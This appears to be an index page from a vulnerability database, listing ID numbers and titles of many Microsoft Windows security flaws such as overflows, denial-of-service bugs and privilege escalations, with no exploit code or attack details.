Windows Media Player ASF Runtime Voice Sample Rate Handling Arbitrary Code Execution [58843] Microsoft Windows Media Player ASF Handling Overflow [58786] Microsoft Windows User Profile Unloading Session Persistence Weakness [58785] Microsoft Windows MFC Component (MFC42u.dll) AfxOleSetEditMenu Function RTF Malformed OLE Object Handling Overflow [57806] Microsoft Windows Wireless LAN AutoConfig Service (wlansvc) Frame Parsing Arbitrary Code Execution [57803] Microsoft Windows Media MP3 File Handling Memory Corruption [57802] Microsoft Windows Media ASF Header Parsing Invalid Free Arbitrary Code Execution [57799] Microsoft Windows srv2.sys Kernel Driver SMB2 Malformed NEGOTIATE PROTOCOL REQUEST Remote DoS [57798] Microsoft Windows DHTML Editing Component ActiveX Arbitrary Code Execution [57797] Microsoft Windows TCP/IP Orphaned Connection Handling Remote DoS [57796] Microsoft Windows TCP/IP Packet State Information Handling Remote Code Execution [57795] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [57016] Microsoft Windows win32k.sys Embedded OpenType Font Handling DoS [56912] Microsoft Windows Terminal Services Client ActiveX Unspecified Overflow [56909] Microsoft Windows AVI Media File Parsing Unspecified Overflow [56908] Microsoft Windows Malformed AVI Header Parsing Arbitrary Code Execution [56904] Microsoft Windows Telnet NTLM Credential Reflection Remote Access [56902] Microsoft Windows Workstation Service NetrGetJoinInformation Function Local Memory Corruption Arbitrary Code Execution [56901] Microsoft Windows Message Queuing Service (MSMQ) mqac.sys IOCTL Request Parsing Local Privilege Escalation [56900] Microsoft Windows Internet Name Service (WINS) Network Packet Handling Remote Integer Overflow [56899] Microsoft Windows Internet Name Service (WINS) Push Request Handling Remote Overflow [56780] Microsoft Windows win32k.sys NtUserConsoleControl Function Memory Manipulation Local Privilege Escalation [56516] Microsoft Windows lpCmdLine Filename Whitespace Handling Weakness [56514] Microsoft Windows gzip Libraries Unspecified Remote Code Execution [56513] Microsoft Windows Autorun / NoDriveTypeAutoRun Registry Value Enforcement Weakness [55843] Microsoft Windows Embedded OpenType (EOT) Font Name Tables Parsing Overflow [55842] Microsoft Windows Embedded OpenType (EOT) Font Data Record Parsing Overflow [55645] Microsoft Windows Live Messenger (WLM) msnmsgr.exe Malformed Content-Type Header Remote DoS [55644] Microsoft Windows Live Messenger Client MSN Protocol over NAT Multiple Header Field Internal IP Disclosure [55332] Microsoft Windows PPTP Server (Raspptpe.sys) Malformed Control Packet Remote DoS [55309] Microsoft Windows ICMP Type 9 Packet Remote DoS [55050] Microsoft Windows win32k.sys Thread Handling Local Race Condition DoS [54961] Microsoft Office PowerPoint Freelance Windows Translator (FL21WIN.DLL) Layout Parsing Overflow [54943] Microsoft Windows Kernel Desktop Parameter Manipulation Local Privilege Escalation [54942] Microsoft Windows Kernel Driver Class Registration Local Privilege Escalation [54941] Microsoft Windows Kernel User Mode Pointer Passing Local Privilege Escalation [54940] Microsoft Windows Kernel Desktop Object Manipulation Local Privilege Escalation [54939] Microsoft Office Works for Windows File Converter .wps Handling Overflow [54938] Microsoft Windows Active Directory Crafted LDAP(S) Request Handling Remote DoS [54937] Microsoft Windows Active Directory Crafted LDAP(S) Request Hexdecimal DN AttributeValue Handling Arbitrary Code Execution [54936] Microsoft Windows RPC Marshalling Engine Internal State Manipulation Remote Code Execution [54935] Microsoft Windows MSHTML Search Preview Display Information Disclosure [54934] Microsoft Windows Print Spooler Load Library Crafted RPC Message Arbitrary DLL Loading Privilege Escalation [54933] Microsoft Windows Print Spooler Crafted Separator Page Arbitrary Local File Disclosure [54932] Microsoft Windows Print Spooler win32spl.dll EnumeratePrintShares Function Remote Overflow [54931] Microsoft Windows SystemParametersInfo() Function SPI_*DESKWALLPAPER Call Local DoS [54191] Microsoft Windows GDI+ PNG File Handling Infinite Loop DoS [53804] Microsoft Windows Media Player MID File Handling Overflow DoS [53668] Microsoft Windows ThreadPool ACL Enforcement Weakness Local Privilege Escalation [53667] Microsoft Windows RPCSS Service Isolation Local Privilege Escalation [53666] Microsoft Windows Management Instrumentation (WMI) Service Isolation Local Privilege Escalation [53623] Microsoft Windows SearchPath File Open / Locating Unspecified Arbitrary Code Execution [53621] Microsoft Windows HTTP Services Digital Certificate Distinguished Name Mismatch Weakness [53620] Microsoft Windows HTTP Services Web Server Response Unspecified Integer Underflow [53619] Microsoft Windows HTTP Services NTLM Credential Replay Privileged Code Execution [53533] Microsoft Windows Task Manager (taskmgr.exe) I/O Activity Local Information Disclosure [53309] Microsoft Windows WINS 1Ch Registration Domain Controller Manipulation [53248] Microsoft Windows DNS Server Crafted Packets Remote Memory Consumption DoS [52892] Microsoft IE on Windows Link Click Unspecified Arbitrary Code Execution (PWN2OWN) [52694] Microsoft Windows Media Player Malformed GET Request DoS [52693] Microsoft Windows Mobile Bluetooth Stack OBEX FTP Service Traversal Arbitrary File Manipulation [52685] Microsoft Windows FTP Client Multiple Command Overflows [52683] Microsoft Windows explorer.exe Malformed PNG Handling DoS [52682] Microsoft Windows Explorer ZIP Handler DoS [52681] Microsoft Windows Firewall sessmgr.exe Port Restriction Local Bypass [52524] Microsoft Windows Invalid Pointer Local Privilege Escalation [52523] Microsoft Windows Handle Validation Local Privilege Escalation [52522] Microsoft Windows GDI Kernel Component Unspecified Remote Code Execution [52521] Microsoft Windows SChannel Certificate Based Authentication Spoofing Bypass [52520] Microsoft Windows WPAD WINS Server Registration Web Proxy MiTM Weakness [52519] Microsoft Windows DNS Server WPAD Registration Dynamic Update MiTM Weakness [52518] Microsoft Windows DNS Server Response Response Validation Transaction ID Prediction Weakness [52517] Microsoft Windows DNS Server Query Validation Spoofing [51433] Microsoft Windows Crafted CHM File Handling Overflow [51133] Microsoft Windows Media Player Multiple File Handling Remote Overflow [50567] Microsoft Windows WordPad Text Converter Unspecified Memory Corruption [50566] Microsoft Windows Explorer search-ms Protocol Handler Arbitrary Code Execution [50565] Microsoft Windows Explorer Saved Search File Handling Arbitrary Code Execution [50562] Microsoft Windows GDI WMF Image Size Parameter Parsing Overflow [50561] Microsoft Windows GDI WMF Image Parsing Integer Math Overflow [50559] Microsoft Windows Media Component Crafted ISATAP Address NTLM Credential Disclosure [50558] Microsoft Windows Media Component Service Principal Name (SPN) Credential Reflection Arbitrary Code Execution [50533] Microsoft Windows Media Services nskey.dll ActiveX CallHTMLHelp Method Overflow [50287] Microsoft Windows Vista iphlpapi.dll CreateIpForwardEntry2() Function Memory Corruption [50280] Microsoft Windows UnhookWindowsHookEx Call Saturation Race Condition Local DoS [50252] Microsoft Windows Media Player Crafted DAT File MThd Header Handling DoS [50251] Microsoft Windows Media Player Crafted MIDI File MThd Header Handling DoS [50000] Microsoft Windows Active Directory LDAP Server Bind Request User Account Enumeration [49897] Microsoft Windows Explorer Crafted ZIP File Handling DoS [49895] Microsoft Windows GDI+ gdiplus.dll Crafted ICO File Handling DoS [49736] Microsoft Windows SMB NTLM Authentication Credential Replay Remote Code Execution [49364] Cisco PIX / ASA Microsoft Windows NT VPN Domain Authentication Bypass [49243] Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution [49061] Microsoft Windows Ancillary Function Driver (afd.sys) Local Privilege Escalation [49060] Microsoft Windows Message Queuing Service RPC Request Handling Remote Code Execution [49058] Microsoft Windows Active Directory LDAP(S) Request Handling Remote Overflow [49057] Microsoft Windows SMB File Name Handling Remote Underflow [49056] Microsoft Windows Kernel Memory Corruption Local Privilege Escalation [49055] Microsoft Windows Kernel New Window Creation Process Arbitrary Code Execution [49054] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [49053] Microsoft Windows Virtual Address Descriptors (VAD) Local Privilege Escalation [48837] Microsoft Windows Vista Page Fault Handling DoS [48789] Microsoft Windows Mobile Bluetooth Device Name Overflow DoS [48359] Microsoft Windows Vista ASLR / DEP Memory Protection Bypass [48302] Microsoft Windows nslookup.exe DNS Zone Transfer Request Unspecified Arbitrary Code Execution [48153] Microsoft Windows srv.sys WRITE_ANDX SMB Packet Handling Remote DoS [48037] Microsoft Windows Image Acquisition Logger ActiveX Open Method Arbitrary File Download [48009] Microsoft Windows Kernel IopfCompleteRequest API Overflow [47963] Microsoft Windows Media Player Audio File Sampling Rate Remote Code Execution [47962] Microsoft Windows Media Encoder wmex.dll ActiveX Overflow [47412] Microsoft Windows Event System Crafted Request Array Index Handling Remote Privilege Escalation [47411] Microsoft Windows Event System Per-user Subscription Crafted Request Remote Privilege Escalation [47403] Microsoft Windows Messenger ActiveX (Messenger.UIAutomation.1) Remote Privileged Operations [47396] Microsoft Windows IPsec Policy Import Failure Cleartext Remote Information Disclosure [47395] Microsoft Windows Image Color Management System (MSCMS) mscms.dll InternalOpenColorProfile Function ICM Image File Handling Overflow [46990] Microsoft Windows Explorer (explorer.exe) Unspecified WMF Handling DoS [46801] Microsoft Windows Calendar Malformed ICS File Handling DoS [46778] Microsoft Windows DNS Query ID Field Prediction Cache Poisoning [46777] Microsoft Windows DNS Socket Entropy Weakness Cache Poisoning [46774] Microsoft Windows Explorer Saved Search File Handling DoS [46210] Microsoft Windows Installer msiexec.exe /uninstall Option GUID Value Overflow [46068] Microsoft Windows Pragmatic General Multicast (PGM) Fragment Handling Remote DoS [46067] Microsoft Windows Pragmatic General Multicast (PGM) Packet Handling Remote DoS [46066] Microsoft Windows Active Directory LDAP Request Processing Remote DoS [46063] Microsoft Windows Internet Name Service (WINS) Packet Handling Local Privilege Escalation [46062] Microsoft Windows Speech Components (sapi.dll) Speech Recognition Code Execution [46061] Microsoft Windows Bluetooth SDP Packet Processing Remote Code Execution [45809] Microsoft Windows Vista Kernel Unspecified Remote Issue [45523] Microsoft Windows Live Messenger GDI Engine Malformed File Handling Overflow [45521] Microsoft Windows Explorer (explorer.exe) Malformed PNG Handling Remote DoS [45280] Microsoft Windows Media Player (WMP) mplay32.exe MP3 Filename Handling Local Overflow [45048] Microsoft Windows XP I2O Utility Filter Driver (i2omgmt.sys) Local Privilege Escalation [44975] Microsoft Windows CE GIF Imaging Component Unspecified Arbitrary Code Execution [44974] Microsoft Windows CE JPEG (GDI+) Handling Unspecified Arbitrary Code Execution [44880] Microsoft Windows msjet40.dll MDB File Handling Overflow [44580] Microsoft Windows Microsoft Distributed Transaction Coordinator (MSDTC) SeImpersonatePrivilege User Right Local Privilege Escalation [44215] Microsoft Windows GDI EMF Filename Parameter Handling Overflow [44214] Microsoft Windows GDI WMF Handling CreateDIBPatternBrushPt Function Overflow [44213] Microsoft Windows GDI (gdi32.dll) EMF File Handling Multiple Overflows [44206] Microsoft Windows Kernel Unspecified Privilege Escalation [44200] Microsoft Windows Random Number Generator (RNG) CryptGenRandom Function Prediction Weakness [44172] Microsoft Windows DNS Client Predictable Transaction ID Spoofing [44171] Microsoft Windows HxTocCtrl ActiveX (hxvz.dll) Memory Corruption [44018] Microsoft Windows Vista SP1 Page Protection Unspecified Bypass [43773] Microsoft Windows Explorer (explorer.exe) GIF File Handling Remote DoS [43715] Microsoft Windows Media Player (WMP) AIFF File Handling DoS [43603] Microsoft Windows DNS Server Dynamic Update Mechanism Client Authentication Bypass [43434] Microsoft Windows Vista NoDriveTypeAutoRun Auto-Play Bypass [43307] Microsoft Windows Explorer (explorer.exe) AVI Handling Right-Click Action DoS [42579] 3ivx MPEG-4 on Microsoft Windows Media Player (WMP) mplayer2.exe MP4 File Handling Overflow [41553] Microsoft Windows Explorer BMP Width Dimension Handling Overflow [41491] Microsoft Windows Vista Crafted DHCP Response DoS [41463] Microsoft Windows OLE Automation Unspecified Memory Corruption Remote Code Execution [41156] Microsoft Windows x64 Kernel PatchGuard Bypass [41155] Microsoft Windows Hardware-enforced DEP Bypass [41154] Microsoft Windows XP EFS Cleartext Password Storage [41097] Microsoft Windows Task Scheduler (at.exe) Local Privilege Escalation [41093] Microsoft Windows Media Player (WMP) MSIE Static Invocation HTML Rendering Weakness [41092] Microsoft Windows DNS Service Predictable Transaction ID Weakness [41090] Microsoft Windows w/ IE7 Shell32.dll Crafted URL Third-party Application Arbitrary Command Execution [41065] Microsoft Windows kernel32.dll Multiple Function DoS [41064] Microsoft Windows ntdll.dll Multiple Function DoS [41059] Microsoft Windows ARP Saturation Remote DoS [40071] Microsoft Windows LSASS Crafted LPC Request Local Privilege Escalation [40070] Microsoft Windows TCP/IP IGMPv3 / MLDv2 Packet Handling Remote Code Execution [40069] Microsoft Windows TCP/IP ICMP RDP Packet Handling Remote DoS [39521] Cisco Security Agent for Microsoft Windows Crafted SMB Packet Remote Overflow [39131] Microsoft Windows Media Player Crafted AU File Application Crash Remote DoS [39127] Microsoft Windows DirectX WAV / AVI File Parsing Arbitrary Code Execution [39126] Microsoft Windows DirectX SAMI File Parsing Arbitrary Code Execution [39125] Microsoft Windows Vista SMBv2 Signing Unspecified Remote Code Execution [39124] Microsoft Windows Vista Kernel Legacy Reply Path Validation Local Privilege Escalation [39123] Microsoft Windows Message Queuing MSMQ Message Handling Arbitrary Code Execution [39122] Microsoft Windows Media Format Runtime ASF Parsing Arbitrary Code Execution [39014] Microsoft Windows RunAs Command Local Arbitrary Process DoS [38991] Microsoft Windows PNG Image IHDR block Multiple Crafted Value Remote DoS [38499] Microsoft Windows Mobile ActiveSync USB Weak PIN/Password Encryption [38494] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) ICO Handling DoS [37637] Microsoft Windows Crafted HLP File Overflow [37635] Microsoft Windows Virtual DOS Machine (VDM) PhysicalMemory Race Condition Local Privilege Escalation [37631] Microsoft Windows Malformed NNTP Response Remote Memory Corruption [37629] Microsoft Windows 2000 RPC Authentication Unspecified Information Disclosure [37628] Microsoft Windows 2000 RPC Authentication Crafted Request Remote DoS [37627] Microsoft Windows Kodak Image Viewer Image File Handling Arbitrary Code Execution [37105] Microsoft Windows mfc42.dll / mfc42u.dll CFileFind Class FindFile() Function Overflow [36938] Microsoft Windows XP Kernel Process Scheduler Local DoS [36937] Microsoft Windows / IE ActiveX (triedit.dll) Multiple Property NULL Pointer DoS [36935] Microsoft Windows Services for UNIX Local Privilege Escalation [36393] Microsoft Windows Vista Weather Gadgets Crafted HTML Attribute Unspecified Issue [36392] Microsoft Windows Vista Contacts Gadget Crafted Contact Information Arbitrary Code Execution [36391] Microsoft Windows Vista Feed Headlines Gadgets RSS Feed XSS [36390] Microsoft Windows Vector Markup Language (VML) VGX.DLL CDownloadSink Class Overflow [36388] Microsoft Windows Graphics Rendering Engine (GDI) Metafile Image Handling Overflow [36387] Microsoft Windows OLE Automation TextNode Object substringData Method Overflow [36386] Microsoft Windows Media Player Skin File Handling Crafted Header Arbitrary Code Execution [36385] Microsoft Windows Media Player Skin File Handling Overflow [36149] Microsoft IE on Windows Mobile Unspecified Overflow DoS [36148] Microsoft Windows Mobile Pictures and Videos Malformed JPEG DoS [36146] Microsoft Windows Terminal Services TLS Downgrade Weakness [36145] Microsoft Windows Event Viewer (eventvwr.exe) Log Data Exclusion [36144] Microsoft Windows Bluetooth Unspecified Remote Privilege Escalation [36143] Microsoft Windows Mobile Pocket PC Edition Unspecified Remote Privilege Escalation [36141] Microsoft Windows Explorer Ole32.dll Crafted Document Summary Information DoS [36138] Microsoft Windows Active Directory Time Restriction User Enumeration [35962] Microsoft Windows XP Registry QHEADLES Permission Weakness [35961] Microsoft Windows Active Directory LDAP Service Crafted Request Remote DoS [35960] Microsoft Windows Active Directory LDAP Service Convertible Attribute Remote Code Execution [35952] Microsoft Windows Vista Teredo Crafted IPv6 Traffic Blocking Rule Bypass [35637] Microsoft Windows Unspecified Remote Code Execution [35347] Microsoft Windows Schannel Security Package Crafted Digital Signature Arbitrary Code Execution [35346] Microsoft Outlook Express / Windows Mail MHTML Content Disposition Parsing Cross Domain Information Disclosure [35345] Microsoft Outlook Express / Windows Mail URL Parsing Cross Domain Information Disclosure [35344] Microsoft Windows Vista Local User Information Data Stores Information Disclosure [35341] Microsoft Windows Win32 API Unspecified Remote Code Execution [34490] Microsoft Windows Explorer Folder Browsing WMV Handling DoS [34103] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) DNS Subversion [34102] Microsoft Windows Vista Mail Client Crafted Link Arbitrary Program Execution [34101] Microsoft Windows XP winmm.dll mmioRead Function DoS [34100] Microsoft Windows DNS RPC Interface Zone Name Remote Overflow [34099] Microsoft Windows TrueType Fonts Rasterizer Local Privilege Escalation [34098] Microsoft Windows GDI Functions Windows Metafile (WMF) Handling DoS [34097] Microsoft Windows GDI Enhanced Metafile (EMF) Handling Local Privilege Escalation [34096] Microsoft Windows GDI Invalid Window Size Local Privilege Escalation [34095] Microsoft Windows GDI Crafted Image Local Privilege Escalation [34011] Microsoft Windows Kernel Mapped Memory Local Privilege Escalation [34010] Microsoft Windows XP UPnP Remote Memory Corruption [34009] Microsoft Windows Agent URL Parsing Memory Corruption [34008] Microsoft Windows Vista CSRSS Local Privilege Escalation [33668] Microsoft Windows Vista Meeting Space DFSR.exe TCP Connection Persistence [33667] Microsoft Windows Vista Persistent Established Teredo Address [33666] Microsoft Windows Vista Teredo nonce Spoofing [33665] Microsoft Windows Vista Neighbor Discovery Crafted Neighbor Advertisement Redirect [33664] Microsoft Windows Vista Crafted Gratuitous ARP Overwrite DoS [33663] Microsoft Windows Vista LLTD Mapper HELLO Packet Spoofing [33662] Microsoft Windows Vista LLTD Mapper Real Source Field Host Spoofing [33661] Microsoft Windows Vista LLTD Responder Race Condition Host Spoofing [33660] Microsoft Windows Vista LLTD Mapper EMIT Packet Gathering Remote DoS [33635] AMD ATI Radeon for Microsoft Windows Vista atikmdag.sys Kernel Mode Driver DoS [33628] Microsoft Windows NDISTAPI.sys Permission Weakness Local DoS [33474] Microsoft Windows ReadDirectoryChangesW API Function File System Information Disclosure [33307] Microsoft Windows Media MID Malformed Header Chunk DoS [33306] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [33219] Microsoft Windows Live Messenger Gestual Emoticon Saturation CPU Consumption DoS [32629] Microsoft IE on Windows Mobile Malformed WML Page Unspecified DoS [32628] Microsoft Windows / IE ActiveX (mshtml.dll) Multiple Property NULL Pointer DoS [32445] Microsoft Windows Workstation Service NetrWkstaUserEnum RPC Request DoS [31897] Microsoft Windows CSRSS NtRaiseHardError Function Arbitrary Memory Disclosure [31890] Microsoft Windows Shell New Hardware Local Privilege Escalation [31889] Microsoft Windows XP SP2 Image Aquisition Service Local Privilege Escalation [31885] Microsoft Windows OLE Dialog Memory Corruption Remote Code Execution [31884] Microsoft Windows HTML Help ActiveX Control Arbitrary Code Execution [31659] Microsoft Windows CSRSS MessageBox Function Privilege Escalation [31645] Microsoft Windows DNS Recursive Query DoS [30997] Microsoft Windows .manifest File Handling Local DoS [30871] Microsoft Windows DRM drmstor.dll ActiveX Object StoreLicense Function Memory Corruption [30823] Microsoft Windows Print Spooler (spoolsv.exe) RpcGetPrinterData Function DoS [30821] Microsoft Outlook Express Windows Address Book Contact Record Code Execution [30819] Microsoft Windows Media Player ASX Playlist Handling Overflow [30818] Microsoft Windows Media Player ASF Parsing Overflow [30817] Microsoft Windows Remote Installation Service TFTP Arbitrary File Overwrite [30811] Microsoft Windows SNMP Service Remote Overflow [30405] Microsoft Windows Active Directory Unspecified DoS [30263] Microsoft Windows Workstation Service Crafted Message Remote Overflow [30262] Microsoft Windows Agent ACF File Handling Memory Corruption [30261] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote DoS [30260] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote Code Execution [30214] Microsoft Windows GDI Kernel Structure Modification Code Execution [30096] Microsoft Windows NAT Helper Components ipnathlp.dll with ICS Malformed DNS Query DoS [29529] Microsoft Windows 2000 creator.dll ActiveX COM Object Memory Corruption [29528] Microsoft Windows 2000 msdxm.ocx ActiveX COM Object Memory Corruption [29527] Microsoft Windows 2000 myinfo.dll ActiveX COM Object Memory Corruption [29526] Microsoft Windows 2000 ciodm.dll ActiveX COM Object Memory Corruption [29439] Microsoft Windows Server Service Crafted SMB Packet Unspecified Issue [29424] Microsoft Windows Object Packager File Extension Dialog Spoofing [29409] Microsoft Windows TCP 135 Crafted Packet Saturation DoS [29351] Microsoft Windows Terminal Services tsuserex.dll COM Object Instantiation [29231] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Arbitrary Code Execution [29128] Microsoft Windows gdiplus.dll Divide-by-zero DoS [28731] Microsoft Windows Pragmatic General Multicast (PGM) Multicast Message Arbitrary Code Execution [28729] Microsoft Windows Indexing Service Unspecified XSS [28372] Microsoft Windows Explorer URL Passing Recursive file Tag Local DoS [28208] Microsoft Windows Live Messenger Contact List .ctt File Heap Overflow [27848] Microsoft Windows Kernel Unspecified Local Privilege Escalation [27847] Microsoft Windows Unhandled Exception Unspecified Remote Code Execution [27846] Microsoft Windows Winlogon Search Path Subversion Local Privilege Escalation [27845] Microsoft Windows Server Service Crafted RPC Message Remote Overflow [27844] Microsoft Windows DNS Client Service Record Response Overflow [27843] Microsoft Windows Winsock API Hostname Remote Code Execution [27797] Microsoft Windows GDI library (gdi32.dll) createBrushIndirect Function WMF Parsing DoS [27644] Microsoft Windows Server Driver (srv.sys) Crafted SMB Packet NULL Dereference DoS [27155] Microsoft Windows Server Service SRV.SYS Crafted Request SMB Information Disclosure [27154] Microsoft Windows Server Service SRV.SYS First-class Mailslot Message Remote Overflow [27152] Microsoft Windows IIS ASP Page Processing Overflow [27151] Microsoft Windows DHCP Client Service Crafted Response Overflow [26440] Microsoft Windows SMB MrxSmbCscIoctlOpenForCopyChunk Function Overflow [26439] Microsoft Windows SMB MRXSMB.SYS MrxSmbCscIoctlCloseForCopyChunk Remote DoS [26438] Microsoft Windows RPC Mutual Authentication Server Spoofing [26437] Microsoft Windows RRAS RASMAN Remote Overflow [26436] Microsoft Windows RASMAN RPC Request Remote Overflow [26433] Microsoft Windows TCP/IP Protocol Driver Source Routing Overflow [26432] Microsoft Windows jgdw400.dll ART Image Rendering Overflow [26431] Microsoft Windows Graphics Rendering Engine PolyPolygon Function Overflow [26430] Microsoft Windows Media Player PNG Processing Overflow [25949] Microsoft Windows INETCOMM.DLL mhtml: URI Overflow [25761] Microsoft Windows NTDLL.DLL RtlDosPathNameToNtPathName_U API Path Conversion Weakness [25501] Microsoft Windows itss.dll CHM Processing Overflow [25336] Microsoft Windows Distributed Transaction Coordinator (DTC) BuildContextW Request DoS [25335] Microsoft Windows Distributed Transaction Coordinator (DTC) CRpcIoManagerServer::BuildContext Function Remote Overflow [24802] Microsoft Windows Help winhlp32.exe Embedded Image Processing Overflow [24519] Microsoft Outlook Express Windows Address Book (.wab) Processing Overflow [24516] Microsoft Windows Explorer COM Object Handling Remote Code Execution [23136] Microsoft Windows/Office Korean Input Method Editor (IME) ShellAbout() Privilege Escalation [23134] Microsoft Windows Web Client Service Crafted WebDAV Request Overflow [23133] Microsoft Windows IGMPv3 Crafted Packet Remote DoS [23132] Microsoft Windows Media Player Plug-in Malformed EMBED Element Arbitrary Code Execution [23131] Microsoft Windows Media Player Bitmap File Processing Overflow [23047] Microsoft Windows SSDP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23046] Microsoft Windows SCardSvr SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23045] Microsoft Windows NetBT SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23044] Microsoft Windows UPnP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [22710] Microsoft Windows Ad-hoc Network Advertisement Weakness [22697] Microsoft Windows Unspecified Display Driver Large Image Processing DoS [22396] Microsoft Windows WMF Processing ExtEscape POSTSCRIPT_INJECTION Function Overflow DoS [22371] Microsoft Windows WMF Processing ExtCreateRegion Function Overflow DoS [21987] Microsoft Windows Shimgvw.dll SETABORTPROC Function Crafted WMF Arbitrary Code Execution [21598] Microsoft Windows 2000 NetBIOS Port Malformed TCP Packet Parsing Remote DoS [21536] Microsoft Windows backup File Name Extension Overflow [21510] Microsoft Windows SynAttackProtect Bypass [20916] Microsoft Windows UPnP GetDeviceList Remote DoS [20875] Microsoft Windows XP Professional Upgrade MSIE Rollback [20580] Microsoft Windows GetEnhMetaFilePaletteEntries() EMF File Rendering DoS [20579] Microsoft Windows GDI Metafile SetPalette Entries Overflow [20497] Microsoft Windows 98SE User32.dll Icon DoS [20367] Microsoft Windows XP Fast User Switching Arbitrary Account Lockout [20366] Microsoft Windows XP Remote Desktop Client Cleartext Account Name Transmission [20364] Microsoft Windows keybd_event Validation Privilege Escalation [20356] Microsoft Windows Win32k.sys ShowWindow Function Local DoS [20279] Microsoft Windows ME ssdpsrv.exe Crafted SSDP Message DoS [20256] Microsoft Windows 2000 NTFS Volume Macintosh Client Directory Permission Modification [20222] Microsoft Windows 2000 runas.exe Named Pipe Spoofing Information Disclosure [20221] Microsoft Windows 2000 runas.exe Named Pipe Single Thread DoS [20220] Microsoft Windows 2000 runas.exe Cleartext Authentication Information Disclosure [20188] Microsoft Windows Crafted SMB SMBnegprots Request DOS [20148] Microsoft Windows smbmount Directory Manipulation Saturation DoS [20028] Microsoft Windows XP SP2 TFTP Local Overflow [20002] Microsoft Windows 2000 CHKDSK Fix Mode File ACL Failure [20001] Microsoft Windows 2000 Terminal Service Client Connection IP Logging Failure [20000] Microsoft Windows 2000 Domain Administrator Computer Lock Bypass [19999] Microsoft Windows 2000 FQDN Domain Login Password Expiry Bypass [19998] Microsoft Windows 2000 UPN Credentialed Login Group Policy Failure [19997] Microsoft Windows 2000 WideCharToMultiByte Function String Termination Issue [19996] Microsoft Windows 2000 Event ID 1704 Group Policy Failure [19995] Microsoft Windows 2000 SECEDIT Long Folder ACL Set Issue [19994] Microsoft Windows 2000 audit directory service access 565 Event Logging Failure [19993] Microsoft Windows 2000 LDAPS CA Trust Issue [19922] Microsoft Windows Client Service for NetWare (CSNW) Remote Overflow [19904] Microsoft Windows DTC Packet Relay DoS [19903] Microsoft Windows DTC Transaction Internet Protocol (TIP) DoS [19902] Microsoft Windows COM+ Remote Code Execution [19901] Microsoft Windows FTP Client Arbitrary File Write [19900] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2122) [19899] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2118) [19898] Microsoft Windows Web View Arbitrary Script Injection [19873] Microsoft Windows XP Wireless Zero Configuration Credential/Key Disclosure [19857] Microsoft Windows SeDebugPrivilege NtSystemDebugControl Function Privilege Escalation [19775] Microsoft Windows XP ISAKMP UDP Saturation DoS [19764] Microsoft Windows XP Malformed explorer.exe.manifest Local DoS [19287] Microsoft Windows Firewall Malformed Registry Entry Ruleset Exception Weakness [19187] Microsoft Windows NT/2000 DNS Server Non-delegated NS Glue Record Cache Poisoning [19185] Microsoft Windows XP Internet Connection Firewall sessmgr.exe Accss Control Bypass [19007] Microsoft Windows 95 smbclient Triple Dot Traversal Arbitrary Command Execution [19006] Microsoft Windows NT snmp.exe Malformed OID Packet Saturation DoS [18956] Microsoft Windows Registry Editor (Regedt32.exe) Long String Obfuscation [18830] Microsoft Windows UMPNPMGR wsprintfW Remote Overflow [18829] Microsoft Windows Open Type (EOT) Font Handling Remote Overflow [18828] Microsoft Windows Distributed Transaction Coordinator (DTC) Memory Modification Remote Code Execution [18824] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050627) [18823] Microsoft Windows Kernel APC Queue Manipulation Local Privilege Escalation [18821] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050505) [18820] Microsoft Windows GDI EMF/WMF Metafile Processing Multiple Overflows [18730] Microsoft Windows XP SP1 Raw IP Empty Datagram DoS [18729] Microsoft Windows SNMP LAN Manager (LANMAN) MIB Extension GET/NEXT Request DoS [18728] Microsoft Windows QueryIpMatching Weakness DNS Cache Poisoning [18681] Microsoft Windows XP User Account Manager Hidden User [18624] Microsoft Windows Remote Desktop Protocol (RDP) Crafted Packet Remote DoS [18607] Microsoft Windows Print Spooler Service Remote Overflow [18606] Microsoft Windows Telephony Application Programming Interface (TAPI) Overflow [18605] Microsoft Windows Plug-and-Play Service Remote Overflow [18545] Microsoft Windows NT Cenroll ActiveX (xenroll.dll) File Creation Saturation DoS [18493] Microsoft Windows USB Device Driver Overflow [17885] Microsoft Windows Network Connections Service netman.dll Remote DoS [17860] Microsoft Windows NULL Session MSRPC Interface Remote eventlog Disclosure [17859] Microsoft Windows NULL Session svcctl MSRPC Interface SCM Service Enumeration [17830] Microsoft Windows Color Management Module ICC Profile Format Tag Remote Overflow [17434] Microsoft Windows ASN.1 BERDecBitString Function Overflow [17309] Microsoft Windows Web Client Request Processing Remote Code Execution [17308] Microsoft Windows Server Message Block (SMB) Remote Code Execution [17305] Microsoft Windows HTML Help (CHM) File Overflow [17304] Microsoft Windows Interactive Training .cbo File User Field Overflow [17131] Microsoft Windows Remote Desktop Protocol (RDP) Private Key Disclosure [16494] Microsoft Windows Media Player WMDRM License Acquisition Page Redirection [16430] Microsoft Windows Animated Cursor (ANI) Capability AnimationHeaderBlock Length Field Overflow [15981] Microsoft Windows XP helpctr.exe Crafted URL Command Execution [15739] Microsoft Windows Malformed Image Rendering DoS [15707] Microsoft Windows Explorer Web View Arbitrary Script Insertion [15469] Microsoft Windows MSHTA Shell Application Association Arbitrary Remote Script Execution [15463] Microsoft Windows IP Validation Failure Remote Code Execution [15462] Microsoft Windows CSRSS Local Overflow [15461] Microsoft Windows Object Management Malformed Request DoS [15460] Microsoft Windows Kernel Access Request Local Privilege Escalation [15459] Microsoft Windows Font Processing Local Privilege Escalation [15458] Microsoft Windows Message Queuing Remote Overflow [15379] Microsoft Windows ActiveDirectory LDAP Authentication Bypass [15363] Microsoft Windows Explorer.exe Malformed .wmf Processing DoS [15343] Microsoft Windows Server 2003 Malformed HTTP Cookie Header CGI DoS [15341] Microsoft Windows Server 2003 SMB Redirector Processing DoS [15340] 